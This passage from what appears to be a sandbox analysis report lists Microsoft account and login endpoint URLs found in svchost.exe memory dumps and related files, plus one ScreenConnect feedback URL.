                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063568750.000002487B557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                  Source: ScreenConnect.Core.dll0.1.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                  Source: svchost.exe, 00000006.00000003.2055900652.00000246CF5B0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: svchost.exe, 00000007.00000002.3286034426.000002487BCA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                  Source: svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfH
                  Source: svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000007.00000003.2063661365.000002487B56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502rise
                  Source: svchost.exe, 00000007.00000003.2063661365.000002487B56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600er
                  Source: svchost.exe, 00000007.00000003.2063661365.000002487B56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B52C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601ine.
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                  Source: svchost.exe, 00000007.00000002.3285930293.000002487BC7E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2281301768.000002487BC09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285785350.000002487BC0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf94Co
                  Source: svchost.exe, 00000007.00000002.3286034426.000002487BCA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srfA7826
                  Source: svchost.exe, 00000007.00000003.2281301768.000002487BC09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285785350.000002487BC0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srfDb
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                  Source: svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063661365.000002487B56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063339170.000002487B510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srfdate.srf
                  Source: svchost.exe, 00000007.00000003.2063661365.000002487B56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srfogin.
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000007.00000003.2063661365.000002487B56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfssuerte.sr
                  Source: svchost.exe, 00000007.00000003.2063661365.000002487B56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfssuern
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                  Source: svchost.exe, 00000007.00000003.2063661365.000002487B56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srfcfg:Resol
                  Source: svchost.exe, 00000007.00000003.2063661365.000002487B56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B52C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2221590936.000002487B55A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-Dmz3u6IqJTzzN1GAvvKvxWL
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srfe
                  Source: svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                  Source: svchost.exe, 00000007.00000003.2063661365.000002487B56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfce
                  Source: svchost.exe, 00000007.00000003.2063263833.000002487B52C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                  Source: svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                  Source: svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                  Source: svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                  Source: svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                  Source: svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806043
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063568750.000002487B557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                  Source: svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063354814.000002487B55A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B52C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                  Source: svchost.exe, 00000007.00000003.2063339170.000002487B510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfty
                  Source: svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                  Source: svchost.exe, 00000007.00000003.2186905900.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                  Source: svchost.exe, 00000007.00000003.2186905900.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2281301768.000002487BC09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285785350.000002487BC0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285900941.000002487BC5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 00000007.00000002.3285589879.000002487B537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf4n#
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comami
                  Source: svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srfH
                  Source: svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 00000007.00000003.2063339170.000002487B510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
                  Source: svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsuer
                  Source: svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srfsuer
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063339170.000002487B510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
